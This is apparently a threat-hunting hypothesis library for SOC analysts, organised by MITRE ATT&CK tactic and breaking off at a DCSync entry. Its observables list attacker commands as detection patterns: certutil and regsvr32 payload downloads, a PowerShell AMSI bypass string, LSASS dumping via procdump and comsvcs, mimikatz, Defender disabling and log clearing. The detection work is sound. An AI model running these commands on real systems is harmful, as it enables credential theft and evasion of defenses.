Threat Hunt Hypothesis Library¶

50+ ready-to-use hunting hypotheses organized by MITRE ATT&CK tactic. Each hypothesis includes the threat model, data sources, hunt methodology, and success criteria. This library is designed to be the single most comprehensive free reference for SOC analysts and threat hunters conducting proactive security operations.

Hypothesis Format¶

Each hypothesis follows this statement structure:

"[Threat actor / malware family] may be [TTP description] using [technique] which would be observable in [data source] as [observable behavior]."

TA0001 — Initial Access¶

HYP-001 — Phishing Attachment Execution via Office Macros¶

Hypothesis: A threat actor may be gaining initial access through phishing emails containing macro-enabled Office documents which would be observable in endpoint process telemetry and email gateway logs as Office application processes spawning unexpected child processes.

Data Sources:

• Endpoint process creation logs (EDR, Sysmon Event ID 1)
• Email gateway logs (MTA headers, attachment hashes)
• Windows Event Log (4688)
• File creation events (Sysmon Event ID 11)

Hunt Method: Query for processes where the parent is WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, or ONENOTE.EXE and the child is any shell interpreter, download utility, or scripting engine. Pivot on any parent-child chain involving cmd.exe, powershell.exe, wscript.exe, cscript.exe, mshta.exe, or certutil.exe. Correlate process creation timestamps with email delivery timestamps from the gateway.

Key Observables:

• WINWORD.EXE → cmd.exe → powershell.exe spawn chain
• EXCEL.EXE spawning wscript.exe or cscript.exe
• Office process creating files in %TEMP%, %APPDATA%, or C:\Users\Public\
• DNS resolution for unusual domains within 60 seconds of document open
• EXCEL.EXE → regsvr32.exe (squiblydoo pattern)

False Positive Sources: Legitimate macro-enabled finance templates that automate reporting workflows; IT-deployed Excel workbooks that call PowerShell for data refresh. Validate by correlating with email headers and checking if the document was received externally.

HYP-002 — VPN / Remote Access Brute Force and Credential Stuffing¶

Hypothesis: A threat actor may be conducting credential stuffing against internet-facing VPN or remote access portals which would be observable in authentication logs as high volumes of failed login attempts from distributed source IPs followed by a successful authentication.

Data Sources:

• VPN authentication logs (Cisco ASA, Palo Alto GlobalProtect, Fortinet)
• Azure AD / Entra ID sign-in logs
• RADIUS / TACACS+ logs
• Firewall connection logs

Hunt Method: Identify accounts with more than 10 failed authentication attempts within a 5-minute window from external IPs. Flag any account that transitions from repeated failures to a successful authentication — this "success after spray" pattern is the highest-fidelity indicator. Cluster source IPs into /24 subnets and flag distributed spray patterns where individual IPs fail fewer than 3 times but total attempts against a single account exceed threshold.

Key Observables:

• Single account: multiple failures from different ASNs within 1 hour then success
• Many accounts: 1-2 attempts per account from same IP (password spray pattern)
• Successful login from IP/ASN that never appeared in 90-day baseline
• MFA bypass or legacy auth protocol used at time of success
• New device fingerprint or user-agent at first successful login

False Positive Sources: Users with forgotten passwords triggering lockout; shared service accounts accessed from NAT pools; automated monitoring scripts that retry on failure.

HYP-003 — Initial Access via Initial Access Broker (IAB) Purchased Credentials¶

Hypothesis: A threat actor using credentials purchased from an Initial Access Broker may be authenticating to cloud or on-premises services which would be observable in authentication telemetry as legitimate credentials used from anomalous geolocations, new devices, or at unusual times with no prior MFA enrollment challenge.

Data Sources:

• Azure AD / Entra ID sign-in logs (risk detections)
• Okta system log
• VPN authentication with geolocation enrichment
• HR systems for employee location baselines

Hunt Method: Compare authentication geolocations against each user's 90-day historical login locations. Flag impossible travel (authentication from two geographically distant locations within a timeframe that makes physical travel impossible). Query for first-time-seen device fingerprints, user-agents, or IP ASNs for accounts older than 30 days. Cross-reference flagged accounts against threat intelligence feeds for compromised credential indicators.

Key Observables:

• Login from country never seen in 90-day history
• Impossible travel: two auths from cities 1,000+ km apart within 4 hours
• Successful auth with no MFA challenge on MFA-enrolled account (legacy protocol bypass)
• First use of username after 30+ days of inactivity
• Successful auth from known hosting/VPS ASNs (common proxy infrastructure)

False Positive Sources: Business travel; split-tunnel VPN where exit node changes; employees using mobile data vs. office WiFi; IT admin testing from staging environment.

HYP-004 — Drive-By Compromise via Watering Hole¶

Hypothesis: A threat actor may be compromising websites frequented by target organization employees (watering hole) which would be observable in web proxy and DNS logs as browser processes making connections to newly registered domains immediately after visiting legitimate sites, followed by payload download.

Data Sources:

• Web proxy / Secure Web Gateway logs (full URL with referrer)
• DNS query logs
• Endpoint process creation (browser child processes)
• Network flow data

Hunt Method: Query for browser processes (Chrome, Edge, Firefox) spawning child processes or writing executables to disk. Identify DNS resolutions of domains registered within the last 30 days that occurred within 30 seconds of visiting known legitimate industry sites. Look for drive-by exploit indicators: browser crash/recovery events preceding unexpected process creation.

Key Observables:

• Browser spawning cmd.exe, powershell.exe, or mshta.exe directly
• JavaScript file downloaded from domain registered < 30 days ago
• Redirect chain: legitimate site → ad network → exploit kit domain
• Browser process writing PE file to disk
• Unusual browser plugin installation event

False Positive Sources: Legitimate ad network redirects; browser update mechanisms; web-based developer tools.

HYP-005 — Exploitation of Public-Facing Application¶

Hypothesis: A threat actor may be exploiting vulnerabilities in internet-facing web applications or APIs which would be observable in web application logs and WAF alerts as anomalous request patterns including SQL injection strings, directory traversal sequences, or deserialization payloads followed by unexpected server-side process execution.

Data Sources:

• Web application / IIS / Apache / Nginx access logs
• WAF alert logs
• Application server process creation logs
• Network IDS signatures

Hunt Method: Hunt for web server worker processes (w3wp.exe, java.exe, tomcat.exe, nginx) spawning unexpected child processes, especially shells. Correlate with WAF-blocked requests to the same endpoints to identify bypass attempts. Search application logs for SQL injection pattern strings (UNION SELECT, ' OR 1=1, xp_cmdshell), path traversal (../../../), and Java deserialization markers (aced0005).

Key Observables:

• w3wp.exe or java.exe spawning cmd.exe or powershell.exe
• HTTP 500 responses to requests containing injection strings
• Outbound connection from web server process to external IP
• File creation in web root by web server process
• whoami or ipconfig execution by web server worker

False Positive Sources: Automated vulnerability scanners (authorized); developer debug tooling; legitimate Java application invoking system commands for build tasks.

TA0002 — Execution¶

HYP-006 — PowerShell Obfuscation and Encoded Command Execution¶

Hypothesis: A threat actor may be executing obfuscated PowerShell to evade detection which would be observable in PowerShell script block logging and process creation logs as highly encoded command-line arguments, character replacement patterns, or invocation through unusual parent processes.

Data Sources:

• PowerShell ScriptBlock logs (Event ID 4104)
• PowerShell Module logs (Event ID 4103)
• Process creation logs (Sysmon Event ID 1 / Event ID 4688 with command line)
• AMSI telemetry

Hunt Method: Query command-line arguments for -EncodedCommand, -enc, or -e flags followed by base64 strings. Calculate entropy of PowerShell command-line arguments — legitimate scripts have predictable entropy while obfuscated commands have high character entropy. Hunt for PowerShell ScriptBlock events containing string manipulation functions ([char], -join, -replace, [Convert]::FromBase64String) used in execution context. Look for powershell.exe -WindowStyle Hidden -NonInteractive -NoProfile.

Key Observables:

• -EncodedCommand with base64 payload containing IEX, Invoke-Expression, or download cradles
• PowerShell ScriptBlock with repeated [char] cast arrays (char array obfuscation)
• powershell.exe called from non-interactive parent (Scheduled Task, WMI, COM)
• Download cradle patterns: (New-Object Net.WebClient).DownloadString, IEX(IWR
• AMSI bypass strings: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')

False Positive Sources: Legitimate IT automation scripts that encode credentials; System Center Configuration Manager (SCCM) management scripts; vendor deployment scripts.

HYP-007 — Living-off-the-Land Binary (LOLBin) Abuse¶

Hypothesis: A threat actor may be using legitimate Windows binaries to execute malicious code and evade detection which would be observable in process creation logs as known LOLBins invoked with unusual arguments, from anomalous parent processes, or performing behaviors outside their designed function.

Data Sources:

• Process creation logs with full command-line (Sysmon Event ID 1)
• Network connection logs (Sysmon Event ID 3)
• File creation events (Sysmon Event ID 11)
• DNS query logs

Hunt Method: Build a baseline of legitimate LOLBin usage in your environment and hunt for deviations. Focus on: certutil.exe -decode or -urlcache -f (file download); mshta.exe with remote URL argument; regsvr32.exe /s /u /i:<url> (squiblydoo); rundll32.exe calling non-system DLLs; bitsadmin.exe /transfer creating jobs to external URLs. Flag any of these executing from user's temp directories.

Key Observables:

• certutil.exe -urlcache -split -f http://[external-ip]/payload.exe
• mshta.exe http://[domain]/[script].hta
• regsvr32.exe /s /u /i:http://[domain]/[file].sct scrobj.dll
• rundll32.exe javascript:"\..\[path]"
• bitsadmin /transfer to external IP followed by bitsadmin /complete
• wmic.exe process call create "[command]"

False Positive Sources: IT administration using certutil for legitimate certificate operations; SCCM using BITS for patch delivery; helpdesk tools leveraging mshta.exe for interactive dialogs.

HYP-008 — WMI for Remote Code Execution¶

Hypothesis: A threat actor may be using Windows Management Instrumentation to execute commands on remote systems to avoid creating network shares or service installations which would be observable in WMI activity logs and network logs as WMI process creation calls over DCOM (port 135/TCP) from non-administrative workstations.

Data Sources:

• WMI-Activity/Operational Event Log (Event IDs 5857, 5858, 5860, 5861)
• Sysmon Event ID 20/21 (WMIEventFilter/Consumer activity)
• Network connection logs (DCOM, port 135)
• Process creation (parent: WmiPrvSE.exe)

Hunt Method: Query for processes where the parent is WmiPrvSE.exe — any child process spawned this way indicates remote WMI execution. Identify source workstations making DCOM connections (port 135) to other workstations (lateral movement) vs. servers (expected admin pattern). Cross-reference with user account context: WMI execution from a standard user account is highly anomalous.

Key Observables:

• WmiPrvSE.exe → cmd.exe → [payload] process chain
• DCOM connections from workstation to workstation on port 135
• wmic.exe with /node:[remote-computer] argument from non-admin workstation
• New WMI subscription created (Event ID 5861)
• scrcons.exe (WMI script consumer) spawning shell

False Positive Sources: IT monitoring agents (SCCM, SCOM) that use WMI for inventory; helpdesk remote management; legitimate administrative automation.

HYP-009 — Malicious Scripting via Visual Basic or JavaScript (WSH)¶

Hypothesis: A threat actor may be executing malicious VBScript or JScript via Windows Script Host as a second-stage payload delivery mechanism which would be observable in process creation logs as wscript.exe or cscript.exe executing from user-writable directories with network connectivity shortly after execution.

Data Sources:

• Process creation logs (Sysmon Event ID 1)
• Network connection logs (Sysmon Event ID 3)
• File creation events
• DNS query logs

Hunt Method: Identify wscript.exe or cscript.exe executing scripts from %TEMP%, %APPDATA%, %PUBLIC%, or any path received via email attachment. Flag WSH processes making outbound network connections or creating executable files. Correlate with parent process: WSH called from explorer.exe after double-click is expected; WSH called from powershell.exe or cmd.exe is suspicious.

Key Observables:

• wscript.exe %TEMP%\[random].vbs executed from powershell.exe
• WSH process creating files with .exe, .dll, .bat extensions
• WSH process making DNS queries to newly registered domains
• cscript.exe //nologo //b (batch/silent mode) in unusual directories
• Scripts containing CreateObject("WScript.Shell") with Run method calls

False Positive Sources: Legacy enterprise applications using VBScript for business logic; login scripts distributed via GPO; vendor-supplied WSH-based management utilities.

TA0003 — Persistence¶

HYP-010 — Registry Run Key Persistence¶

Hypothesis: A threat actor may be establishing persistence via Windows registry Run keys to survive reboots which would be observable in registry modification logs and Autoruns data as new entries added to standard autorun registry locations by non-system processes or at unusual times.

Data Sources:

• Sysmon Event ID 13 (Registry value set)
• Windows Security Event ID 4657 (Registry value modified) — requires SACL
• Autoruns output (baseline comparison)
• EDR registry telemetry

Hunt Method: Baseline all registry Run key values across the environment and alert on any additions or modifications. Focus on: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and their RunOnce variants. Compare current Autoruns snapshots against a weekly baseline. Investigate any entry pointing to %TEMP%, %APPDATA%, or non-standard paths.

Key Observables:

• New registry Run entry pointing to %TEMP%\[random].exe
• Run key value created by powershell.exe or cmd.exe (not installer)
• Run entry pointing to a path that does not exist (payload deleted, persistence orphaned)
• Run key with encoded command (cmd.exe /c powershell -enc [base64])
• Multiple Run keys created within seconds (automated installer behavior differs from attackers)

False Positive Sources: Software installations (antivirus, productivity tools); update mechanisms; IT-distributed software via GPO or SCCM.

HYP-011 — Scheduled Task Persistence¶

Hypothesis: A threat actor may be creating scheduled tasks to maintain persistence and re-execute payloads which would be observable in Windows Task Scheduler logs and Sysmon file creation events as new tasks created by non-system accounts pointing to user-writable directories or executing encoded commands.

Data Sources:

• Windows Security Event ID 4698 (Scheduled task created)
• Windows Event ID 4702 (Scheduled task updated)
• Sysmon Event ID 11 (File creation in C:\Windows\System32\Tasks\)
• Task Scheduler Operational log (Microsoft-Windows-TaskScheduler/Operational)

Hunt Method: Alert on Event ID 4698 for tasks created outside software deployment windows. Review task XML for: actions pointing to non-standard directories; triggers set for high frequency (every minute); tasks running under SYSTEM or high-privilege accounts created by standard user accounts. Compare C:\Windows\System32\Tasks\ file hashes against known-good baseline.

Key Observables:

• Task created by user account pointing to %APPDATA%\[random]\[random].exe
• Task with <RunLevel>HighestAvailable</RunLevel> created by non-admin
• Task hidden from Task Scheduler UI (XML modified, task security descriptor)
• schtasks.exe /create /sc minute /mo 1 in process creation logs
• Task action calling powershell.exe -WindowStyle Hidden -enc [base64]

False Positive Sources: Software update schedulers; backup agents; IT monitoring tools creating legitimate maintenance tasks.

HYP-012 — WMI Event Subscription Persistence¶

Hypothesis: A threat actor may be using WMI permanent event subscriptions for fileless persistence that survives reboots and evades file-based detection which would be observable in WMI repository changes and Sysmon WMI events as new EventFilter, EventConsumer, and FilterToConsumerBinding objects created outside of normal software deployment.

Data Sources:

• Sysmon Event IDs 19, 20, 21 (WMI filter, consumer, binding)
• WMI-Activity Operational log
• WMI repository (C:\Windows\System32\wbem\Repository\) file modification timestamps
• PowerShell ScriptBlock logs (WMI subscription creation commands)

Hunt Method: Enumerate all existing WMI permanent subscriptions using Get-WMIObject -Namespace root\subscription -Class __EventFilter and compare against a documented baseline. Any subscription not in baseline requires investigation. Parse CommandLineEventConsumer and ActiveScriptEventConsumer content for encoded payloads or unusual paths. Sysmon Event IDs 19-21 provide real-time alerting on new subscription creation.

Key Observables:

• ActiveScriptEventConsumer with VBScript or JScript payload containing encoded strings
• CommandLineEventConsumer calling powershell.exe -enc [base64]
• WMI subscription trigger: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' (common persistence trigger)
• Subscription names designed to blend in: "SCM Event Log Filter", "Windows Update"
• WMI repository files modified outside of OS patch or software install windows

False Positive Sources: Some endpoint security products and monitoring agents use WMI subscriptions legitimately. Document and baseline all known-good subscriptions.

HYP-013 — Boot or Logon Autostart via Startup Folder¶

Hypothesis: A threat actor may be placing malicious files in Windows startup folders to achieve persistence across user logons which would be observable in file creation events as executables or shortcut (.lnk) files written to startup directory paths by non-installer processes.

Data Sources:

• Sysmon Event ID 11 (File creation)
• Windows Security Event ID 4663 (File access with SACL)
• EDR file telemetry
• Autoruns baseline comparison

Hunt Method: Monitor file creation events in C:\Users\[*]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ and C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\. Alert on any non-.lnk file in startup folders, and investigate .lnk files created by processes other than Windows Explorer or installer processes. Check shortcut targets for obfuscated command lines.

Key Observables:

• Executable file (.exe, .dll, .bat, .vbs) placed directly in startup folder
• .lnk file created by cmd.exe or powershell.exe pointing to payload in %TEMP%
• Startup folder modification at 2-4 AM (attacker operating hours)
• LNK file with environment variable expansion pointing outside standard directories
• Multiple new startup entries created within the same session

False Positive Sources: Software installers legitimately creating startup shortcuts; user-created startup scripts; remote desktop connection tools.

HYP-014 — Bootkit or MBR/VBR Persistence¶

Hypothesis: A threat actor deploying sophisticated malware may be modifying the Master Boot Record or Volume Boot Record to achieve pre-OS persistence which would be observable in raw disk write events and integrity monitoring alerts as direct writes to sectors 0-63 of a physical disk by non-OS processes.

Data Sources:

• EDR kernel-level disk I/O telemetry
• Windows Security Event ID 6 (Kernel driver loaded)
• Integrity monitoring (TPM/Secure Boot attestation)
• Forensic disk acquisition (offline verification)

Hunt Method: Compare current MBR/VBR hash against a known-good baseline captured at system build. Use tools like dd (Linux) or RawDisk (Windows) to extract sector 0 and hash it. Monitor for unsigned kernel drivers loaded at boot. Review Secure Boot logs for policy violations. In enterprise environments, TPM attestation logs will capture boot measurement deviations.

Key Observables:

• MBR hash deviation from baseline
• Secure Boot violation events in Windows Event Log (Event ID 1796)
• Unsigned driver loaded at boot (BitLocker precondition failure)
• Process writing to \\.\PhysicalDrive0 without system context
• BIOS/UEFI firmware hash change (firmware-level implant)

False Positive Sources: Disk partitioning tools; full-disk encryption enrollment (BitLocker modifies boot sector); OS upgrades; some legitimate bootloaders (rEFInd, GRUB dual-boot).

TA0004 — Privilege Escalation¶

HYP-015 — Token Manipulation and Impersonation¶

Hypothesis: A threat actor may be performing Windows token manipulation to escalate privileges or impersonate higher-privileged users which would be observable in Windows Security logs as impersonation logon events (Type 9) or as processes obtaining SeDebugPrivilege or SeImpersonatePrivilege from unusual parent processes.

Data Sources:

• Windows Security Event ID 4624 (Type 9 — NewCredentials logon)
• Windows Security Event ID 4672 (Special privileges assigned to new logon)
• Sysmon Event ID 10 (Process access — SeDebugPrivilege grants)
• EDR privilege escalation detections

Hunt Method: Hunt for processes invoking DuplicateTokenEx, ImpersonateLoggedOnUser, or CreateProcessWithTokenW API calls detected by EDR. Look for Event ID 4624 Type 9 logons (runas /netonly pattern) from non-administrative workstations. Identify standard user processes that gain SeDebugPrivilege — legitimate use is confined to debuggers.

Key Observables:

• Standard user process acquiring SeDebugPrivilege or SeTcbPrivilege
• Event ID 4624 Type 9 logon followed by elevated process creation
• cmd.exe or powershell.exe running under different user context than parent
• Juice Potato / Rogue Potato indicators: SeImpersonatePrivilege + COM server creation
• Token duplication from lsass.exe or other SYSTEM processes

False Positive Sources: Legitimate runas usage by IT administrators; application virtualization platforms; privileged access workstations with deliberate context switching.

HYP-016 — DLL Hijacking for Privilege Escalation¶

Hypothesis: A threat actor may be exploiting DLL search order to load a malicious DLL in place of a legitimate one which would be observable in image load events as known Windows executables loading DLLs from non-standard paths, particularly user-writable directories.

Data Sources:

• Sysmon Event ID 7 (Image loaded) with signature status
• EDR DLL load telemetry
• File creation events in system directories
• Process creation with loaded module list

Hunt Method: Query for DLL loads where: the DLL is loaded from a user-writable path (%APPDATA%, %TEMP%, application directory) by a process that normally loads that DLL from System32; the DLL is unsigned or signed by an unexpected publisher; or the DLL load occurs from a newly created file. Focus on known DLL hijack targets: comctl32.dll, version.dll, dwmapi.dll in application directories.

Key Observables:

• version.dll loaded from C:\Program Files\[Application]\ instead of System32
• Unsigned DLL loaded by signed Microsoft binary
• DLL with Microsoft-spoofing name loaded from non-System32 path
• Newly written DLL in application directory immediately before elevated process starts
• appinfo.dll or consent.dll loaded from non-standard path (UAC bypass)

False Positive Sources: Application-specific version.dll overrides (some applications ship their own); side-by-side (SxS) assembly loading; portable application bundles.

HYP-017 — Unquoted Service Path Exploitation¶

Hypothesis: A threat actor may be exploiting services configured with unquoted executable paths containing spaces to achieve privilege escalation which would be observable in file creation and service start events as executable files placed in intermediate path positions that are executed by the Service Control Manager.

Data Sources:

• Windows Service configuration (SC query / registry)
• File creation events in C:\Program Files\ and C:\Program Files (x86)\
• Windows System Event ID 7045 (New service installed)
• Process creation events (parent: services.exe)

Hunt Method: Enumerate all service binaries using sc qc or registry inspection under HKLM\SYSTEM\CurrentControlSet\Services. Identify services where ImagePath contains spaces and is not enclosed in quotes. For each, determine whether the intermediate path directories are writable by non-admin users. Treat any writable unquoted service path as a vulnerability; treat a file creation in that path followed by service start as an active exploit.

Key Observables:

• New executable file created at C:\Program Files\[Vendor]\[executable].exe (vs. intended C:\Program Files\[Vendor]\[SubDir]\[executable].exe)
• Service path: C:\Program Files\Some Vendor\Application\binary.exe (unquoted)
• File C:\Program.exe created (extreme case targeting root)
• SCM starting a binary not matching the expected service image path hash
• Low-privilege user creating file in C:\Program Files\

False Positive Sources: Misconfigured but non-malicious services are common. The key signal is file creation in the hijackable path, not the service misconfiguration alone.

TA0005 — Defense Evasion¶

HYP-018 — EDR/AV Tampering and Disabling¶

Hypothesis: A threat actor may be attempting to disable or tamper with endpoint security software to operate undetected which would be observable in Windows Event Logs, service control manager logs, and EDR telemetry as security service stop commands, registry modifications disabling security products, or process termination of security agent processes.

Data Sources:

• Windows System Event ID 7036 (Service state change)
• Windows Security Event ID 4657 (Registry modification)
• EDR self-protection telemetry
• Process creation logs (process termination commands)

Hunt Method: Alert on any stop/disable commands targeting known security product service names (MsMpEng, SepMasterService, ekrn, CSFalconService, CylanceSvc). Hunt for registry modifications to HKLM\SOFTWARE\Policies\Microsoft\Windows Defender — particularly setting DisableAntiSpyware = 1. Detect taskkill /f /im [AV process] or sc stop [AV service] from non-SYSTEM processes.

Key Observables:

• sc stop WinDefend or Set-MpPreference -DisableRealtimeMonitoring $true
• Registry: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1
• Event ID 7036: Security service entered stopped state without expected maintenance window
• net stop targeting multiple security-related services in sequence
• EDR process handle opened by non-system process with terminate permissions
• bcdedit.exe /set safeboot minimal (prepare for safeboot AV bypass)

False Positive Sources: IT security operations may legitimately stop AV for maintenance; security software updates may briefly stop services; authorized red team exercises.

HYP-019 — Windows Event Log Clearing¶

Hypothesis: A threat actor may be clearing Windows event logs to destroy evidence of their activity which would be observable in the Security event log as Event ID 1102 (audit log cleared) or System event log as Event ID 104 (log cleared), particularly when cleared outside of documented maintenance windows.

Data Sources:

• Windows Security Event ID 1102 (Security log cleared)
• Windows System Event ID 104 (System log cleared)
• SIEM ingestion gaps (absence of expected events)
• EDR process creation (wevtutil.exe, PowerShell Clear-EventLog)

Hunt Method: Create high-fidelity alerts on Event IDs 1102 and 104 — these should never fire outside documented administrative windows. Separately, hunt for log ingestion gaps: if a host normally generates 500+ events/hour and drops to zero, this may indicate log clearing not captured in SIEM (logs cleared before forwarding agent ran). Alert on wevtutil.exe cl [log-name] and Clear-EventLog cmdlet usage.

Key Observables:

• Event ID 1102 in Security log (whoever cleared it is recorded)
• Event ID 104 in System log
• wevtutil.exe cl Security or wevtutil.exe cl System in process creation
• PowerShell: Clear-EventLog -LogName Security
• Sudden gap in SIEM event stream from a host (5+ minute silence from previously active host)
• Selective log clearing: only Security log cleared, others intact (targeted anti-forensics)

False Positive Sources: IT helpdesk clearing logs per policy during troubleshooting; Gold image preparation; some older SIEM solutions clear logs after ingestion (poor practice but encountered in legacy environments).

HYP-020 — AMSI Bypass¶

Hypothesis: A threat actor may be bypassing the Antimalware Scan Interface (AMSI) to execute malicious scripts without AV inspection which would be observable in PowerShell script block logs and memory forensics as known AMSI patch patterns or AMSI bypass technique strings appearing in ScriptBlock logs before malicious payload execution.

Data Sources:

• PowerShell ScriptBlock logs (Event ID 4104)
• ETW (Event Tracing for Windows) — AMSI provider
• EDR memory scanning telemetry
• AMSI telemetry from AV products

Hunt Method: Search ScriptBlock logs for known AMSI bypass technique strings: AmsiUtils, amsiInitFailed, amsiContext, AmsiScanBuffer. Hunt for reflection-based access to AMSI: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'). Alert on PowerShell processes that generate ScriptBlock events containing the string amsi within the first 10 events of a session, as this indicates bypass setup before payload execution.

Key Observables:

• [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
• AmsiScanBuffer memory patch signatures
• System.Management.Automation.AmsiUtils accessed via reflection
• PowerShell process writing to amsi.dll memory regions (EDR memory protection alert)
• Encoding/obfuscation of known bypass strings to evade string detection

False Positive Sources: Security researchers and red team operators testing detection coverage (authorized activity); some AV products inspect AMSI themselves and may trigger pattern matches in logs.

HYP-021 — Timestomping and File System Anti-Forensics¶

Hypothesis: A threat actor may be modifying file timestamps (timestomping) to make malicious files appear to have been present for a long time which would be observable as discrepancies between NTFS $MFT timestamps and NTFS $STANDARD_INFORMATION vs. $FILE_NAME attribute timestamps.

Data Sources:

• NTFS MFT artifacts (forensic acquisition)
• Sysmon Event ID 2 (File creation time changed)
• EDR file integrity monitoring
• Timeline analysis tools (Plaso, Autopsy)

Hunt Method: Sysmon Event ID 2 captures file creation time changes — alert on any modification to file creation timestamps by non-OS processes. Forensically, compare $STANDARD_INFORMATION timestamps (which tools like timestomp modify) against $FILE_NAME timestamps (which are harder to change without root-level access). A mismatch where $STANDARD_INFORMATION shows an old date but $FILE_NAME shows recent is a strong timestomping indicator.

Key Observables:

• Sysmon Event ID 2: [process] changed file creation time for [file]
• $SI timestamp prior to OS install date (impossible)
• $SI creation date older than $FN creation date (reversed relationship)
• File with old timestamp but recent hash that doesn't match historical threat intel
• SetFileTime API calls in EDR telemetry from non-backup processes

False Positive Sources: Backup and restore operations legitimately preserve original timestamps; file synchronization tools (robocopy /copyall); some software installers preserve source file dates.

TA0006 — Credential Access¶

HYP-022 — Kerberoasting¶

Hypothesis: A threat actor may be requesting Kerberos service tickets for service accounts to crack them offline which would be observable in Windows Security logs as unusual Kerberos TGS request patterns — specifically RC4 encryption type requests for SPN-associated accounts from user workstations at an anomalous rate.

Data Sources:

• Domain Controller Security Event ID 4769 (Kerberos Service Ticket requested)
• Domain Controller Security Event ID 4770 (Kerberos Service Ticket renewed)
• Network packet capture (Kerberos TGS-REQ/TGS-REP)
• SIEM aggregation of DC logs

Hunt Method: Filter Event ID 4769 for Ticket Encryption Type: 0x17 (RC4-HMAC) — modern environments using AES encryption should rarely see RC4 TGS tickets. A single workstation requesting RC4 TGS tickets for multiple service accounts within a short window is a high-fidelity Kerberoasting indicator. Alert on any account requesting more than 5 unique SPN TGS tickets within a 10-minute window. Compare requesting accounts against AD group membership — standard user requesting tickets for admin service accounts is anomalous.

Key Observables:

• Event ID 4769 with Ticket Encryption Type: 0x17 (RC4) from user workstation
• Single source account requesting TGS for 5+ different SPNs within 5 minutes
• Automated tool signatures in User-Agent or request patterns
• Requests targeting high-value SPNs: MSSQL, Exchange, backup services
• Impacket GetUserSPNs.py network signatures

False Positive Sources: Legacy applications requiring RC4 (document and baseline); some monitoring tools checking SPN existence; Kerberos diagnostics by IT staff.

HYP-023 — AS-REP Roasting¶

Hypothesis: A threat actor may be targeting accounts with Kerberos pre-authentication disabled to obtain crackable AS-REP hashes without authentication which would be observable in Domain Controller logs as Kerberos AS requests without pre-authentication from systems that do not own those accounts.

Data Sources:

• Domain Controller Security Event ID 4768 (Kerberos Authentication Ticket requested)
• Domain Controller Security Event ID 4625 (Failed logon — pre-auth failure)
• Network packet capture (AS-REQ without PA-ENC-TIMESTAMP)
• AD attribute monitoring (userAccountControl flag for DONT_REQUIRE_PREAUTH)

Hunt Method: Query AD for accounts with the DONT_REQUIRE_PREAUTH flag set (userAccountControl contains 0x400000). Alert on any changes that add this flag to accounts. In DC logs, hunt for Event ID 4768 with Pre-Authentication Type: 0 (no pre-auth) originating from a source workstation other than the account owner's known workstations.

Key Observables:

• Event ID 4768 with Pre-Authentication Type: 0x0
• Source IP making AS-REP requests for accounts not associated with that IP
• Multiple AS-REP requests in sequence from single source (enumeration then roasting)
• userAccountControl change on account to add DONT_REQUIRE_PREAUTH
• Network capture: AS-REQ without PA-ENC-TIMESTAMP padata

False Positive Sources: Some legacy applications configured for passwordless Kerberos; service accounts in specific configurations. Proactively document all accounts with pre-auth disabled.

HYP-024 — LSASS Memory Dumping¶

Hypothesis: A threat actor may be dumping credentials from LSASS process memory to harvest plaintext passwords and NTLM hashes which would be observable in EDR process access telemetry and Windows Security logs as unexpected processes opening a handle to lsass.exe with PROCESS_VM_READ access rights.

Data Sources:

• Sysmon Event ID 10 (ProcessAccess — lsass.exe target)
• Windows Security Event ID 4656 (Handle requested for lsass.exe with SACL)
• EDR memory protection alerts
• Windows Credential Guard telemetry

Hunt Method: Alert on any process opening a handle to lsass.exe with 0x1010 (PROCESS_VM_READ + PROCESS_QUERY_INFORMATION) or 0x1FFFFF (PROCESS_ALL_ACCESS) access rights. Legitimate LSASS access comes from a small set of system processes — build a whitelist and alert on everything outside it. Detect procdump.exe -ma lsass, comsvcs.dll MiniDump technique, and Task Manager dump via unusual process names calling MiniDumpWriteDump.

Key Observables:

• procdump.exe -ma lsass.exe in process command line
• rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [PID] [output] full
• Non-whitelisted process opening lsass.exe with PROCESS_VM_READ
• lsass.exe or lsass.dmp file created in unusual location
• mimikatz keyword (or obfuscated variants) in PowerShell ScriptBlock logs
• sekurlsa::logonpasswords string pattern

False Positive Sources: Antivirus products scanning LSASS memory; crash dump collection by Watson/WER; some legitimate security tools; Azure ATP/Defender for Identity agent.

HYP-025 — Password Spraying Against Active Directory¶

Hypothesis: A threat actor may be conducting a low-and-slow password spray against Active Directory accounts to avoid account lockout policies which would be observable in Domain Controller authentication logs as a single password attempted across many accounts from one or few source IPs at a rate below the lockout threshold.

Data Sources:

• Domain Controller Security Event ID 4625 (Failed logon)
• Domain Controller Security Event ID 4771 (Kerberos pre-auth failed)
• LDAP authentication logs
• Authentication aggregation in SIEM

Hunt Method: Aggregate Event ID 4625 failures by source IP. A spray signature is: single source IP generating failures across 20+ distinct usernames within 1 hour, with the failure count per username staying below the lockout threshold (typically 3-5). Also aggregate by failure reason — spray attempts using a correct username format but wrong password will generate "Wrong Password" (0xC000006A) vs. "Account Does Not Exist" (0xC0000064), which helps distinguish enumeration from spray.

Key Observables:

• Single source IP: failures for 30+ accounts, <3 failures per account (spray pattern)
• All failures at regular intervals (automated spray tool cadence)
• Failures followed by a successful logon from same IP (success after spray)
• badPwdCount incremented once across many accounts in AD
• Logon type 3 (network) failures from external IP ranges

False Positive Sources: Mass user lockout after AD password policy change; single SSO/proxy gateway making auth calls appearing as one source IP; users accessing from shared NAT (distinguish by username diversity).

HYP-026 — DCSync Attack¶

Hypothesis: A threat actor with Domain Admin or replication privileges may be performing DCSync to replicate all AD credentials as if they were a domain controller which would be observable in Domain Controller security logs as directory replication requests from non-DC machine accounts.

Data Sources:

• Domain Controller Security Event IDs 4662 (Directory service access with replication rights)
• Network traffic: MS-DRSR protocol (Netlogon service, port 445)
• Azure AD DS or Entra ID audit logs
• EDR network connection telemetry

